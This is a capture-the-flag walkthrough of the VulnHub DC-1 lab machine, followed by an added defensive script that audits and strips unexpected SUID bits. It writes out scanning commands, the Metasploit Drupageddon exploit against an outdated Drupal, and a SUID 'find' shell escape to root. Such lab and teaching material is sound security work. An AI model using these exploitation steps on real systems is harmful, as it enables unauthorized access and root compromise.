DC-1 Walkthrough
Introduction
Today we're going to do a boot2root pentest walkthrough of the DC-1 machine, created by DCAU7 and hosted at https://www.vulnhub.com/entry/dc-1,292/.
For this pentest walkthrough we'll be using two virtual machines, a Kali Linux machine as our attacking system, and the DC-1 machine as our target system.
Locating the Target
After booting up both machines, the first thing to do is locate the target system on our network, so we run netdiscover from our attacking system.
netdiscover -r 10.0.2.0/24
Looks like 10.0.2.20 is our target.
Scanning and Enumeration
We start our scans with nmap, and scan for open TCP and UDP ports on the target system.
nmap -T4 -p- 10.0.2.20 ; nmap -T4 -sU -F 10.0.2.20
Four ports open. We'll run nmap again against those four ports to get more info.
nmap -T4 -A -p22,80,111,58224 10.0.2.20
There's a lot of potential in these robots.txt entries. We might look through them later.
We get a big lead from scans made by the Nessus vulnerability scanner.
It seems that the Drupal CMF (content management framework) is a potential target because the installed version is outdated.
Finding a Way In
With a bit of searching, we find this entry on exploit-db.com. It turns out that this exploit is also available as a Metasploit module, so we start our Metasploit console and load the module.
msfconsole
use exploit/multi/http/drupal_drupageddon
options
Looks like the only option we have to set on this module is the remote host.
set rhosts 10.0.2.20
run
The exploit worked, and we now have a Meterpreter shell on the target system.
Privilege Escalation
Next, we'll drop from our Meterpreter shell to a regular remote shell. Then, we'll upgrade from our non-TTY shell to a more useful one using a Python one-liner command.
shell
python -c 'import pty; pty.spawn("/bin/bash")'
We want to use a script to help us enumerate the target system now that we're in, but we need to download it to our target system first.
wget https://raw.githubusercontent.com/rebootuser/LinEnum/master/LinEnum.sh
Before we can run our enumeration script, we need to give executable permissions to the file.
chmod +x LinEnum.sh
Now we'll run the script with the -t switch to get more thorough results.
./LinEnum.sh -t
After looking through the output of the script, we find something interesting.
The find command is set as a SUID binary, which is a potential tool for privilege escalation. Because find is SUID root, the following command should open a new shell for us with root privileges.
find . -exec /bin/sh \; -quit
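The defender's counterpart to the LinEnum step above, added here as an example rather than taken from the walkthrough: a small POSIX shell audit that reports setuid regular files outside an allowlist (a setuid /usr/bin/find, as on DC-1, would be flagged) and a one-line remediation. The allowlist contents and the function names are my own assumptions.

```shell
#!/bin/sh
# Added example (not from the DC-1 walkthrough): report setuid files that are
# not on an expected-binaries allowlist, then clear the bit on what you find.

# Assumed baseline of setuid binaries expected on a small Debian-style host.
# Override SUID_ALLOWLIST with the real baseline of your own image.
SUID_ALLOWLIST="${SUID_ALLOWLIST:-/usr/bin/passwd /usr/bin/sudo /bin/su /bin/mount /bin/umount /usr/bin/chsh /usr/bin/chfn /usr/bin/gpasswd /usr/bin/newgrp}"

# audit_suid ROOT: print one "UNEXPECTED SUID" line per setuid regular file
# under ROOT that is not in SUID_ALLOWLIST. Prints nothing when clean.
audit_suid() {
    root="$1"
    # -perm -4000 matches the setuid bit; -xdev keeps find on one filesystem;
    # -type f skips symlinks and directories (setuid is meaningless there).
    find "$root" -xdev -type f -perm -4000 2>/dev/null |
    while IFS= read -r path; do
        case " $SUID_ALLOWLIST " in
            *" $path "*) ;;   # expected, on the allowlist
            *)
                owner=$(ls -ld "$path" | awk '{print $3}')
                printf 'UNEXPECTED SUID: %s (owner %s)\n' "$path" "$owner"
                ;;
        esac
    done
}

# strip_suid FILE: remediation for a file the audit reported. A setuid find
# is only an escalation path while the bit is set, so clearing the bit
# removes the problem without deleting the tool.
strip_suid() {
    chmod u-s "$1" && printf 'cleared setuid bit on %s\n' "$1"
}

# Stand-alone use: ./suid_audit.sh /   (report only; remediate by hand).
if [ $# -gt 0 ]; then
    audit_suid "$1"
fi
```

Run it against the image before deployment and again from a cron job so a newly setuid binary shows up in the report rather than in an attacker's enumeration output.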
It worked, and we have a root shell. Now we cat out the system's flag file and we're done.
cd /root
ls
cat thefinalflag.txt
Summary
After our initial scans, we found that the target's Drupal app was outdated and vulnerable to exploit, so we used a Metasploit module to gain a remote shell on the target system. From there, we used a script to enumerate the system and found that a vulnerable command was set as a SUID binary, so we exploited it to gain root access and capture the system's flag.
Finish